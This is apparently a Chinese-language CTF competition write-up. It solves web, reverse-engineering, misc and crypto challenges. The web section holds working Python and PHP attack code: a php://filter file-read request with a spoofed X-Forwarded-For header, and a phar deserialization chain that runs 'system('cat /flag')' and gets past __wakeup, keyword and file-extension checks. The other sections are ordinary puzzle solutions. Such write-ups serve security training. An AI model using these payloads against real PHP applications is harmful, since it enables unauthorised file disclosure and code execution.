广东省大学生网络安全竞赛WP

001. 消失的flag

使用 php:// 伪协议的convert编码格式转换功能读取flag
使用header绕过IP检测

r = requests.get(url, params={"file": "php://filter/convert.iconv.UCS-4.UCS-4/resource=/flag"}, headers={"X-Forwarded-For": "127.0.0.1"})
print(r.text)

003. unserialize_web

扫描看到源码www.tar.gz，使用phar反序列化读取/flag，需要绕过__wakeup关键字检测、文件后缀检测、phar反序列化。生成恶意对象放入phar.phar：

<?php
// 反序列化payload构造
class File {
    public $val1;
    public $val2;
    public $val3;
    
    public function __construct() {
        $this->val1 = "val1";
        $this->val2 = "val2";
    }
    
    public function __destruct() {
        if ($this->val1 === "file" && $this->val2 === "exists") {
            if (preg_match('/^\s*system\s*\(\s*\'cat\s+\/[^;]*\'\s*\);\s*$/' $this->val3)) {
                eval($this->val3);
            } else {
                echo "Access Denied";
            }
        }
    }
    
    public function __access() {
        $Var = "Access Denied";
        echo $Var;
    }
    
    public function __wakeup() {
        $this->val1 = "exists";
        $this->val2 = "file";
        echo "文件存在";
    }
}

$o = new File();
$o->val1='file';
$o->val2='exists';
$o->val3="system('cat /flag');";

// 打开phar文件
@unlink("phar.phar");
$phar = new Phar("phar.phar"); // 生成时后缀名必须为phar
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");

// 放入对象
$phar->setMetadata($o);

// 添加压缩的文件（test为其中的内容）
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
echo 'use phar.phar';
?>

修改phar.phar绕过__wakeup：

def sha1_hash(s):
    sha1_obj = hashlib.sha1()
    sha1_obj.update(s)
    return sha1_obj.digest()

with open("php_docker/phar.phar", "rb") as f:
    content = f.read()
    print(content)
    content = content.replace(b'"File":3', b'"File":4')
    content = content[:-28] + sha1_hash(content[:-28]) + content[-8:]
    print(content)

with open("php_docker/modified.phar", "wb") as out:
    out.write(content)

使用gzip -f modified.phar压缩绕过关键字检测，得到modified.phar.gz，重命名为mod3.jpg绕过文件后缀检测并上传。最后触发，拿到flag：

url = "http://1c300fa3-159a-bef7-2fd1-6e7839227374b834.tq.jxsec.cn:30486/download.php"
r = requests.post(url, data={"file": "phar://upload/mod3.jpg/test.jpg"})
r.encoding = r.apparent_encoding
print(r.text)

Reverse

002. re2

IDA查看main函数：

sub_401170("you win: please the key decrypt flag.\r\n");
sub_401170("flag:uQBF11zD6uYP9kJhRhL8OeesPaaZQQvbl3wx7Ik0T6g=. alg=AES\r\n");

使用findcrypt插件找到CRC32。

crc32和算法解出key：

rand1-key：28672 12779520 1744830464 129 13824
rand2-key：2 9 10 14 5

从内存里面dump出来16byte，获得真key。base64解密得到flag。

misc

001. 猜一猜

压缩包有密码，观察文件名像md5：https://www.cmd5.com/。附件文件名MD5解密得到密码：a1478520。

使用010editor打开，补全PNG文件头得到一个二维码。扫码转到网站：

❀❁❀❇❀✼❀❂✿❆✿✽❁❀✿✾❂❅✿❄❂❉❀✿❂❆❀❃❀✿❂❆✿❀❁✾✻✿❁❁❀❁❂❊✻❂✿❈=

花朵密码，在线解密https://www.qqxiuzi.cn/bianma/wenbenjiami.php?s=huaduo

得到flag{rUsJyNdKhdKuS4VfO7}。

Crypto

001. encipher

d = 4885628697024674802233453512637565599092248491488767824821990279922756927662223348312748794983451796542248787267207054348962258716585568185354414099671493917947012747791554070655258925730967322717771647407982984792632771150018212620323323635510053326184087327891569331050475507897640403090397521797022070233
N = 89714050971394259600440975863751229102748301873549839432714703551498380713981264101533375672970154214062583012365073892089644031804109941766201243163398926438698369735588338279544152140859123834763870759757751944228350552806429642516747541162527058800402619575257179607422628877017180197777983487523142664487
ciphertext = 67254133265602132458415338912590207677514059205474875492945840960242620760650527587490927820914970400738307536068560894182603885331513473363314148815933001614692570010664750071300871546575845539616570277302220914885734071483970427419582877989670767595897758329863040523037547687185382294469780732905652150451

from Crypto.Util.number import long_to_bytes, bytes_to_long
from Crypto.Util.strxor import strxor

m = pow(ciphertext, d, N)
m = long_to_bytes(m)
l = len(m)
key = b'Life is like an ocean only strong-minded can reach the other shore'
key = key[:l]
m = strxor(m, key)

print(m, l)

得到flag{1s_Pa33w0rd_1y2u22}